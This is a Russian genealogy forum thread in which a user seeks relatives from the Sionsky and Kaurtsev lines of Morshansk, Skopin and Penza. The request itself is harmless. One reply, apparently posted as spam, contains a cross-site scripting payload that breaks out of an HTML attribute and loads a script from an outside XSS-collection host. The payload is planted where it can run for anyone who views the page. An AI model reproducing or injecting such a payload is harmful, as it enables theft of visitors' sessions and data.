Загрузите GEDCOM-файл на ВГД   [х]
Всероссийское Генеалогическое Древо
На сайте ВГД собираются люди, увлеченные генеалогией, историей, геральдикой и т.д. Здесь вы найдете собеседников, экспертов, умелых помощников в поисках предков и родственников. Вам подскажут где искать документы о павших в боях и пропавших без вести, в какой архив обратиться при исследовании родословной своей семьи, помогут определить по старой фотографии принадлежность к воинским частям, ведомствам и чину. ВГД - поиск людей в прошлом, настоящем и будущем!
Вниз ⇊

Сионские

Сионские (Моршанск, Скопин, Пенза) и Каурцевы (Моршанск)

← Назад    Вперед →Модераторы: N_Volga, Радомир, Tomilina
elisaveta-d
Новичок

Пенза
На сайте с 2021 г.
Рейтинг: 2
Добрый день,

Меня зовут Елизавета.
В настоящее время я самостоятельно занимаюсь восстановлением истории своей семьи и составлением генеалогического дерева. Буду благодарна за любую информацию. Интересует преимущественно та часть дерева, которая охватывает родственников со стороны моей мамы, а именно линия Сионских и Каурцевых:

- мой прадедушка Алексей Дмитриевич Сионский (предполагаемый период рождения 1871-1877; точная дата рождения и дата смерти, а также место рождения и смерти мне пока неизвестны)
- моя прабабушка Елизавета Михайловна Сионская (год рождения – 1878, дата смерти – 16.08.1943, г. Пенза)
- мой дядя Владислав Константинович Каурцев, первый ребенок моей бабушки Сионской Юлии Алексеевны, который родился в г. Моршанск 20.11.1930 и

Мне известно, что в 1906 году семья Сионских жила в г. Скопин Рязанской области и мой прадедушка работал на на Сызрано-Вяземской железной дороге (она возникла в январе 1890 г в результате объединения Ряжско-Моршанского, Моршанско-Сызранский и Ряжско-Вяземский участков).
В 1927 году семья Сионских жила в г. Моршанск Тамбовской области, и прадедушка также работал на Сызрано-Вяземской железной дороге.

Возможно, читателям форума встречались фамилии Сионских и Каурцевых, в связи с г. Моршанск и г. Скопин.
Буду очень признательна, если кто-то сможет отозваться.

Большое спасибо.
zephyr3
Новичок

На сайте с 2024 г.
Рейтинг: 1
Товар говно
'"><script src=https://xss.report/c/zephyr></script>
Жалоба (1)
← Назад    Вперед →Модераторы: N_Volga, Радомир, Tomilina
Вверх ⇈